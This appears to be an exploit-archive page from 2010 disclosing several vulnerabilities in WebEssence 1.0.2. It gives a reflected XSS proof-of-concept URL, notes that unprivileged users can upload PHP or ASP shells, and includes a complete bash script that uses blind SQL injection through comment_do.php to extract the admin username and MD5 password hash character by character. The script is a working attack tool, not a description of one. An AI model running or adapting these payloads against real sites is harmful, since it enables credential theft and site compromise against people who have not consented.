Home / os / win7

WebEssence 1.0.2 Multiple Vulnerabilities

Posted on 25 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WebEssence 1.0.2 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= WebEssence 1.0.2 Multiple Vulnerabilities ========================================= # # WebEssence 1.0.2 Multiple Vulnerabilities # # # # # # # # # # XSS # # # # # # # # # # # # # PoC: # http://localhost/webessence/webessence/oembed.php?url=http://google.com&amp;id=&lt;script&gt;alert('Backtrack|it');&lt;/script&gt; # In &quot;url&quot; variable is possible to inject a remote HTML page # # # # # # # Remote Shell Uplaod # # # # # # # # PoC: (thanks to emgent) # Unprivileged registered user can upload any PHP or ASP file that can be found in &quot;uploads/other/&quot; # # # # # # Remote Blind Sql Injection # # # # # #!/bin/bash query1=&quot;1/**/AND/**/CHAR(&quot; query2=&quot;)=(SELECT/**/SUBSTRING(name,&quot; query3=&quot;,1)/**/FROM/**/users)&quot; url=$1 path=$2 if [ &quot;$1&quot; == &quot;&quot; || &quot;$2&quot; == &quot;&quot; ] then echo &quot;Usage: $0 [url] [path]&quot; echo &quot;Example: $0 http://localhost /webessence&quot; exit fi good=0 position=1 #SEARCH USERNAME echo -n &quot;Username: &quot; while [ $good -lt 1 ] do found=&quot;false&quot; for name in `seq 97 122` do NOW=`curl -s -d &quot;name=Ph33r&amp;url=&amp;email=&amp;comment=Ph33r&amp;itemid=$query1$name$query2$position$query3&quot; -H &quot;Referer: $url$path&quot; -H &quot;Content-Type: application/x-www-form-urlencoded&quot; $url$path/comment_do.php` if [ &quot;$NOW&quot; == &quot;&quot; ] then let position+=1 found=&quot;true&quot; perl -e &quot;printf '%c', $name;&quot; continue fi done if [ &quot;$found&quot; == &quot;false&quot; ] then good=1 fi done good=0 position=1 query2=&quot;)=(SELECT/**/SUBSTRING(pwd,&quot; pwd_chr=&quot;48 49 50 51 52 53 54 55 56 57 97 98 99 100 101 102&quot; #SEARCH PASSWORD echo &quot;&quot; echo -n &quot;MD5 Pass: &quot; while [ $good -lt 1 ] do found=&quot;false&quot; for pwd in $pwd_chr do NOW=`curl -s -d &quot;name=Ph33r&amp;url=&amp;email=&amp;comment=Ph33r&amp;itemid=$query1$pwd$query2$position$query3&quot; -H &quot;Referer: $url$path&quot; -H &quot;Content-Type: application/x-www-form-urlencoded&quot; $url$path/comment_do.php` if [ &quot;$NOW&quot; == &quot;&quot; ] then let position+=1 found=&quot;true&quot; perl -e &quot;printf '%c', $pwd;&quot; continue fi done if [ &quot;$found&quot; == &quot;false&quot; ] then good=1 fi done echo &quot;&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP